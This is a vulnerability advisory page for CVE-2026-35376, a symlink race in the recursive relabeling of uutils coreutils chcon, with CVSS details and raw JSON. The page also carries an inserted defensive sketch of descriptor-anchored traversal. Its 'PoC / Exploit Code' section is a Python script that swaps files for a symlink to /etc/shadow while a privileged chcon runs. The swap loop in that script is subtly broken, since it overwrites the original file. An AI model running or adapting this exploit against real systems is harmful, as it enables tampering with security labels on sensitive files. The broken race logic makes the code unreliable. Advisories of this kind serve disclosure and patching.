Security Vulnerability Report
CVE-2026-35376 CVSS 4.5 MEDIUM

CVE-2026-35376

Published: 2026-04-22 17:16:42
Last Modified: 2026-05-04 19:06:32

Description

A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the chcon utility of uutils coreutils during recursive operations. The implementation resolves recursive targets using a fresh path lookup (via fts_accpath) rather than binding the traversal and label application to the specific directory state encountered during traversal. Because these operations are not anchored to file descriptors, a local attacker with write access to a directory tree can exploit timing-sensitive rename or symbolic link races to redirect a privileged recursive relabeling operation to unintended files or directories. This vulnerability breaks the hardening expectations for SELinux administration workflows and can lead to the unauthorized modification of security labels on sensitive system objects.
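The description's root cause is that operations are not anchored to file descriptors; the sketch below is an added example of descriptor-anchored traversal, not the uutils fix and not code from this page. `walk_anchored`, `demo` and the `apply` callback are hypothetical names, the label change is replaced by a stand-in that only records what it was handed, and the tree and the swap are constructed in a temporary directory.

```python
import os
import stat
import tempfile

def walk_anchored(dir_fd, apply, rel=""):
    """Walk below dir_fd with dirfd-relative, no-follow opens; apply(fd, rel)
    acts on the descriptor, i.e. on the inode that was actually inspected."""
    skipped = []
    for name in sorted(os.listdir(dir_fd)):
        path = os.path.join(rel, name)
        try:  # O_NOFOLLOW: a symlink at this name fails with ELOOP
            fd = os.open(name, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK,
                         dir_fd=dir_fd)
        except OSError:
            skipped.append(path)
            continue
        try:
            mode = os.fstat(fd).st_mode
            if stat.S_ISDIR(mode) or stat.S_ISREG(mode):
                apply(fd, path)
            else:
                skipped.append(path)  # FIFOs, devices, sockets are left alone
            if stat.S_ISDIR(mode):
                skipped += walk_anchored(fd, apply, path)  # descend via fd, not name
        finally:
            os.close(fd)
    return skipped

def demo():
    """Constructed tree; 'sub' is swapped for a symlink after it was opened."""
    with tempfile.TemporaryDirectory() as tmp:
        root, outside = os.path.join(tmp, "tree"), os.path.join(tmp, "outside")
        os.makedirs(os.path.join(root, "sub"))
        os.makedirs(outside)
        for p in (root + "/safe.txt", root + "/sub/inner.txt", outside + "/secret"):
            open(p, "w").close()
        os.symlink(outside + "/secret", root + "/link")
        seen = []
        def apply(fd, rel):  # stand-in for the fd-based label change
            seen.append((rel, os.fstat(fd).st_ino))
            if rel == "sub":  # simulated swap: the name now points outside
                os.rename(root + "/sub", root + "/moved")
                os.symlink(outside, root + "/sub")
        secret_ino = os.stat(outside + "/secret").st_ino
        root_fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
        try:
            skipped = walk_anchored(root_fd, apply)
        finally:
            os.close(root_fd)
        return [r for r, _ in seen], skipped, secret_ino in [i for _, i in seen]
```

The walker keeps descending into the directory it opened even after the name `sub` has been re-pointed, and the symlink `link` is reported as skipped rather than resolved.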

CVSS Details

CVSS Score: 4.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils < 0.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
import subprocess
import threading
import time

# PoC for CVE-2026-35376: TOCTOU in uutils chcon
# This script attempts to race the chcon utility by swapping a file
# with a symlink to a sensitive target during recursive traversal.

TARGET_DIR = "test_chcon_dir"
SAFE_FILE = "safe.txt"
SYMLINK_TARGET = "/etc/shadow"  # Sensitive file to relabel
TEMP_FILE = "temp_exchange"


def setup():
    """Create the directory structure for testing."""
    if not os.path.exists(TARGET_DIR):
        os.makedirs(TARGET_DIR)
    with open(os.path.join(TARGET_DIR, SAFE_FILE), 'w') as f:
        f.write("innocent data")


def race_exploit():
    """Continuously swap the file to hit the TOCTOU window."""
    print("[+] Starting race thread...")
    while True:
        try:
            # Rename the safe file out of the way
            os.rename(os.path.join(TARGET_DIR, SAFE_FILE),
                      os.path.join(TARGET_DIR, TEMP_FILE))
            # Place a symlink to the sensitive target
            os.symlink(SYMLINK_TARGET, os.path.join(TARGET_DIR, SAFE_FILE))
            # Quickly swap back (or rotate) to maintain plausible structure
            os.rename(os.path.join(TARGET_DIR, SAFE_FILE),
                      os.path.join(TARGET_DIR, TEMP_FILE))
            os.rename(os.path.join(TARGET_DIR, TEMP_FILE),
                      os.path.join(TARGET_DIR, SAFE_FILE))
        except Exception as e:
            pass


def trigger_vulnerability():
    """Simulate the privileged chcon recursive operation."""
    print("[+] Triggering chcon recursive operation...")
    # Note: This requires a context where chcon is actually running
    # and SELinux is enforcing. This is a simulation of the command.
    cmd = ["chcon", "-R", "-t", "etc_t", TARGET_DIR]
    # In a real scenario, this might be called by a cron job or script
    try:
        subprocess.run(cmd, check=True)
    except FileNotFoundError:
        print("chcon command not found, skipping execution.")
    except subprocess.CalledProcessError:
        print("chcon failed, expected if not root or SELinux disabled.")


if __name__ == "__main__":
    setup()
    # Start the race condition thread
    attacker_thread = threading.Thread(target=race_exploit)
    attacker_thread.daemon = True
    attacker_thread.start()
    # Give the thread a moment to start
    time.sleep(0.1)
    # Trigger the vulnerable command
    trigger_vulnerability()
    print("[+] Exploit attempt finished.")
    print("[!] Check if /etc/shadow label has been modified.")
```

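References

https://github.com/uutils/coreutils/pull/11402 (Issue Tracking)
https://github.com/uutils/coreutils/releases/tag/0.8.0 (Release Notes)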

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35376", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:42.430", "lastModified": "2026-05-04T19:06:31.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the chcon utility of uutils coreutils during recursive operations. The implementation resolves recursive targets using a fresh path lookup (via fts_accpath) rather than binding the traversal and label application to the specific directory state encountered during traversal. Because these operations are not anchored to file descriptors, a local attacker with write access to a directory tree can exploit timing-sensitive rename or symbolic link races to redirect a privileged recursive relabeling operation to unintended files or directories. This vulnerability breaks the hardening expectations for SELinux administration workflows and can lead to the unauthorized modification of security labels on sensitive system objects."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 4.7}]}, 
"weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.8.0", "matchCriteriaId": "2365DBBD-6F10-4651-8DA4-08AE79E14423"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/11402", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.8.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}